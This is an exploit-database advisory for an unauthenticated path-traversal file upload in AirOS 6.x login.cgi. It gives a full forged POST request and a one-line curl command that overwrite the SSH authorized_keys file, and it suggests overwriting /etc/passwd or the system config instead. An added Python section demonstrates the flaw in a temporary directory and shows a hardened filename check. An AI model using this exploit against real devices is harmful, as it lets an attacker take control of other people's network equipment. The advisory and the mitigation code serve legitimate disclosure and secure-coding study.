AirOS 6.x - Arbitrary File Upload
EDB-Note Source: https://hackerone.com/reports/73480

Vulnerability

It is possible to overwrite any file (and create new ones) on AirMax systems because "php2" (possibly as a result of a patch) does not validate the "filename" value of a multipart POST request. An unauthenticated user can exploit this vulnerability.

Example

Consider the following request:

    POST https://192.168.1.20/login.cgi HTTP/1.1
    Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US
    Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860
    Content-Length: 773
    User-Agent: Jakarta Commons-HttpClient/3.1
    Host: 192.168.1.20
    Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/; ui_language=en_US

    -----------------------------72971515916103336881230390860
    Content-Disposition: form-data; name="keyfile"; filename="../../etc/dropbear/authorized_keys"
    Content-Type: application/vnd.ms-publisher

    {{Your Public Key HERE}}
    -----------------------------72971515916103336881230390860--

The web server should reduce the file name ../../etc/dropbear/authorized_keys to just authorized_keys, or return a 404. Instead, the AirMax device accepts the file as given, overwriting the original (or creating it if it does not exist). In this case the attacker uploads an arbitrary SSH public key, but the same request can be used to upload configuration files, or "/etc/passwd"...

Consequences

It is possible to take control of any AirMax product with a single forged HTTP POST request, which is disastrous.

Reproducing

With a single command:

    curl -F "keyfile=@/path/to/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k

If SSH is disabled, you can overwrite /etc/passwd and/or /tmp/system.cfg instead.

# 0day.today [2024-03-28] #
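The defect the report describes is a server trusting the client-supplied multipart filename when it builds the destination path. The following Python example is added here to illustrate that; it is not code from the HackerOne report, from Exploit-DB or from Ubiquiti. It parses a constructed multipart body carrying the same traversal filename as the request above, then contrasts the join-as-given behaviour with the basename-plus-containment check the report says the server should have performed. The upload directory layout (fw/www/uploads under a temporary root), the parser, and the key material are assumptions made for the demo.

```python
import os
import posixpath
import re
import tempfile

# Constructed multipart body modelled on the request in the advisory; not a real capture.
# The key material is a placeholder, not a real public key.
BOUNDARY = "---------------------------72971515916103336881230390860"
BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="keyfile"; '
    'filename="../../etc/dropbear/authorized_keys"\r\n'
    "Content-Type: application/vnd.ms-publisher\r\n"
    "\r\n"
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyMaterial attacker@example\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()

_FILENAME_RE = re.compile(r'filename="([^"]*)"')


def parse_upload(body: bytes, boundary: str):
    """Return (filename, data) for the first file part of a multipart/form-data body.

    Minimal parser written for this demo: split on the dash-boundary, separate the
    part headers from the data at the first blank line, and drop the CRLF that
    belongs to the following boundary. The filename is taken verbatim from the
    Content-Disposition header, exactly as an unvalidating server would see it.
    """
    delim = b"--" + boundary.encode()
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):            # closing delimiter "--boundary--"
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]
        m = _FILENAME_RE.search(head.decode("latin-1"))
        if m is None:
            continue                           # plain form field, not a file
        return m.group(1), data
    raise ValueError("no file part in body")


def unsafe_destination(upload_dir: str, filename: str) -> str:
    """The behaviour the advisory describes: client filename joined onto the upload dir as-is."""
    return os.path.realpath(os.path.join(upload_dir, filename))


def safe_destination(upload_dir: str, filename: str) -> str:
    """Hardened version: keep only the last path component, reject degenerate names,
    then confirm the fully resolved path is a direct child of the upload directory."""
    name = posixpath.basename(filename.replace("\\", "/"))
    if name in ("", ".", "..") or "\x00" in name:
        raise ValueError(f"rejected filename {filename!r}")
    root = os.path.realpath(upload_dir)
    dest = os.path.realpath(os.path.join(root, name))
    # realpath follows symlinks, so a planted link inside root is caught here too.
    if os.path.dirname(dest) != root:
        raise ValueError(f"{filename!r} resolves outside {root}")
    return dest


def demo():
    """Run both strategies on the constructed request inside a throwaway directory tree.

    The upload directory is nested three levels deep (a hypothetical layout) so the
    two-level traversal lands inside the temp tree rather than touching the real /etc.
    """
    filename, data = parse_upload(BODY, BOUNDARY)
    with tempfile.TemporaryDirectory() as tmp:
        tmp = os.path.realpath(tmp)
        upload_dir = os.path.join(tmp, "fw", "www", "uploads")
        os.makedirs(upload_dir)

        unsafe = unsafe_destination(upload_dir, filename)
        os.makedirs(os.path.dirname(unsafe), exist_ok=True)  # emulate "create if missing"
        with open(unsafe, "wb") as fh:
            fh.write(data)                                   # the overwrite the report describes

        safe = safe_destination(upload_dir, filename)
        return {
            "filename": filename,
            "unsafe_rel": os.path.relpath(unsafe, tmp),
            "safe_rel": os.path.relpath(safe, tmp),
            "escaped": not unsafe.startswith(upload_dir + os.sep),
            "bytes_written": len(data),
        }


if __name__ == "__main__":
    print(demo())
```

The `-H "Expect:"` in the curl one-liner above suppresses curl's default `Expect: 100-continue` header for multipart bodies, which some embedded HTTP servers do not handle; the example does not emulate that, it only models what happens once the body is parsed. Checking `os.path.dirname(dest) == root` after `realpath` is deliberately stricter than a prefix test, which would accept `/uploads-evil/x` as being under `/uploads`.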